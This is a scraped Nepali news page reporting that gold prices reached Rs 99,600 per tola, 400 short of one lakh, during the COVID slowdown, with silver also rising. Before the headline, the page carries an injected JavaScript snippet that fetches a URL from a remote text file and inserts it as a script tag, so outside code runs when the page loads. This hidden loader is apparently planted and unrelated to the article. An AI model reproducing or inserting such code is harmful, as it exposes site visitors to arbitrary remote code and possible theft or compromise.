;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको भाउ तोलामा लाख पुग्न ४ सय कम – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनको भाउ तोलामा लाख पुग्न ४ सय कम
अर्थ/वाणिज्य

सुनको भाउ तोलामा लाख पुग्न ४ सय कम

साउन १८,
काठमाण्डौ । सुनको भाउ तोलाको झण्डै एक लाख रुपैयाँ पुगेको छ । आज (आइतबार) तोलामा ३ सय रुपैयाँ बढेर सुनको भाउ तोलाको ९९ हजार ६ सय रुपैयाँ निर्धारण गरिएको नेपाल सुनचाँदी व्यवसायी महासङ्घले जनाएको छ । यो अहिलेसम्मकै महँगो भाउ हो ।

कोरोना सङ्क्रमणका कारण विश्व अर्थतन्त्र नै ओरालो लागिरहेको बेला सुनको भाउ भने दिनदिनै उकालो लागिरहेको छ । भाउ महँगो हुँदै गएपछि विभिन्न बैंकमा लकडाउनअघि नै ल्याइएका ३ सय ३० किलो सुन बिक्री हुन नसकेको महासङ्घ अन्तर्गतको भाउ निर्धारण समितिका संयोजक तेजरत्न शाक्यले जानकारी दिए ।

उनकाअनुसार महासङ्घको सिफारिसमा व्यवसायीले बैंकबाट सुन किन्ने गर्छन् । तर भाउ महँगो भएपछि कारोबार ठप्प हुँदा अहिले सुन किनबेच भएको छैन ।

यस्तै मौज्दात रहेको सुन नै बिक्री नभएपछि नयाँ मगाउने काम पनि ठप्प नै भएको छ ।

केही वर्ष अघिसम्म तीज नजिकिएसँगै सुनको कारोबार बढ्ने गरेको भए पनि यसपाली कोरोनाका कारण मानिसले दैनिक उपभोग्य वस्तुलाई प्राथमिकता दिँदा कारोबार नहुने देखिएको छ ।

यस्तै आज चाँदी पनि तोलामा ३० रुपैयाँ बढेर तोलाको १२ सय ३० रुपैयाँ पुगेको छ ।file Photo

फेसबुक प्रतिक्रियाहरु